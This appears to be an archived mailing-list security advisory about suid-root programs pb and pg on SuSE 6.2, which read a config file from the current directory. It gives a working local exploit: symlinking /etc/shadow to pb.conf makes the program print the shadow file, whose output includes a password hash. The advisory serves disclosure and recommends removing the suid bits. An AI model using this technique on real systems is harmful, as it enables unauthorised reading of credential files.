Greetings,
/usr/bin/pb and /usr/bin/pg, suid root by default on SuSE 6.2, allow
any user to read any file on the system as shown:
susebox:/root # ls -la /usr/bin/pb
uname -rwsr-xr-x 1 root root 23544 Jul 22 20:07 /usr/bin/pb
susebox:/root # strace /usr/bin/pb
...
personality(PER_LINUX) = 0
getpid() = 16623
brk(0) = 0x805032c
brk(0x80504cc) = 0x80504cc
brk(0x8051000) = 0x8051000
open("pb.conf", O_RDONLY) <-- trouble? = -1 ENOENT (No such file or
directory)
write(2, "pb.conf fopen: No such file or d"..., 41pb.conf fopen: No such
file or directory
) = 41
_exit(1) = ?
susebox:/root #
---
xnec@susebox:/tmp > id
uid=1001(xnec) gid=100(users) groups=100(users)
xnec@susebox:/tmp > ln -s /etc/shadow ./pb.conf
xnec@susebox:/tmp > pb
Unknown config line : <root:nfpzNvX19GwRg:10850:0:10000::::> =
<bin:*:8902:0:10000::::>
Unknown config line : <daemon:*:8902:0:10000::::> =
<lp:*:9473:0:10000::::>
Unknown config line : <news:*:8902:0:10000::::> = <uucp:*:0:0:10000::::>
Unknown config line : <games:*:0:0:10000::::> = <man:*:8902:0:10000::::>
... etc for the entire shadow file
The same scenario for /usr/bin/pg's pg.conf in your cwd. These two
programs also contain numerous buffer overflows and other insecure file
i/o and should obviously lose their suid bits. They cannot operate
correctly without their s-bits unless they are run by root, but no one
besides root will run them anyway. These programs are not worth
patching.
Brock Tellier
UNIX Systems Administrator
Webley Systems
www.webley.com
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:04:22 PDT